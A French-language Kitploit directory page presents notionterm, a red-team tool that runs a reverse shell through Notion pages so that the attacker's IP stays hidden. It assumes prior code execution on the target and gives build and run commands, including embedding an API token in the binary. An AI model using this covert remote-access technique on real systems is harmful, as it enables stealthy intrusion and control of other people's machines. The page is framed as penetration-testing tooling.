Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
notionterm — Intégrer un reverse shell dans des pages Notion en utilisant l'API Notion comme proxy, permettant des sessions shell distantes furtives avec communication chiffrée et authentifiée pour les opérations d'équipe rouge. | Kitploit
Outils/GitHubGitHub/ariary/notionterm
Génération de PayloadsExploitationRétro-ingénierieSécurité WebCommandement et ContrôleRed Teaming
GitHubariary/notionterm

notionterm

Intégrer un reverse shell dans des pages Notion en utilisant l'API Notion comme proxy, permettant des sessions shell distantes furtives avec communication chiffrée et authentifiée pour les opérations d'équipe rouge.

Voir le dépôt
13715il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

notionterm

Intégrer un reverse shell dans les pages Notion.
Hackez en prenant des notes


demo


POUR ➕ :

  • Masquer l'IP de l'attaquant dans le reverse shell (Aucune interaction directe entre l'attaquant et la machine cible. Notion est utilisé comme proxy hébergeant le reverse shell)
  • Insertion de démo/preuve rapide dans un rapport
  • Reverse shell hautement disponible et partageable (bureau, navigateur, mobile)
  • Shell distant chiffré et authentifié

PAS POUR ➖ :

  • Session shell interactive et longue (voir tacos pour cela)

Pourquoi ? 🤔

L'objectif était de créer quelque chose d'amusant tout en restant utilisable, mais cela n'est pas censé être LA solution de reverse shell dans l'arsenal du pentesteur.

Comment ? 🤷‍♂️

Utilisez Notion comme d'habitude et lancez notionterm sur la cible.

Prérequis 🖊️

  • Logiciel Notion et clé API
  • Communication HTTP autorisée de la cible vers le domaine notion
  • RCE préalable sur la cible

approximativement inspiré par la grande idée de OffensiveNotion et notionion!

TL;DR

Apprendre les commandes et les flags est trop ennuyeux : Utilisez wrap-notionterm.sh

Quickstart

🏗️ Configuration

  1. Créez une page et donnez à la clé API d'intégration les permissions d'écriture sur la page
  2. Compilez notionterm et transférez-le sur la machine cible (voir Build)

👟 Exécution

Il y a 3 façons principales d'exécuter notionterm :

mode « normal »
Obtenir un terminal, l'arrêter/le redémarrer, etc...
notionterm [flags]
Démarrez le shell avec le widget bouton : passez à ON, faites vos trucs de reverse shell, passez à OFF pour mettre en pause, ON pour reprendre, etc...
mode « serveur »
Faciliter l'incorporation de notionterm dans n'importe quelle page
notionterm --server [flags]
Démarrez une session shell dans n'importe quelle page en créant un bloc embed avec une URL contenant l'identifiant de la page (CTRL+L pour l'obtenir) : https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].
mode light
Effectuer uniquement du trafic HTTP de la cible vers notion
notionterm light [flags]

Build

Comme notionterm est destiné à être exécuté sur la machine cible, il doit être compilé pour s'y adapter.

Ainsi, définissez les variables d'environnement pour correspondre aux exigences de la cible :

root@kitploit:~
GOOS=[windows/linux/darwin]

Compilation simple

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go

Vous devrez définir la clé API et l'URL de la page Notion en utilisant soit les variables d'environnement (NOTION_TOKEN & NOTION_PAGE_URL), soit les flags (--token & --page-url)

Compilation « tout-en-un »

Intégrez directement le token d'API d'intégration Notion et l'URL de la page Notion dans le binaire. ⚠️ toute personne ayant accès au binaire peut récupérer le token. Pour des raisons de sécurité, ne le partagez pas et supprimez-le après utilisation.

Définissez les variables d'environnement correspondantes :

root@kitploit:~
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

Et compilez-le :

root@kitploit:~
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS
Télécharger l’outil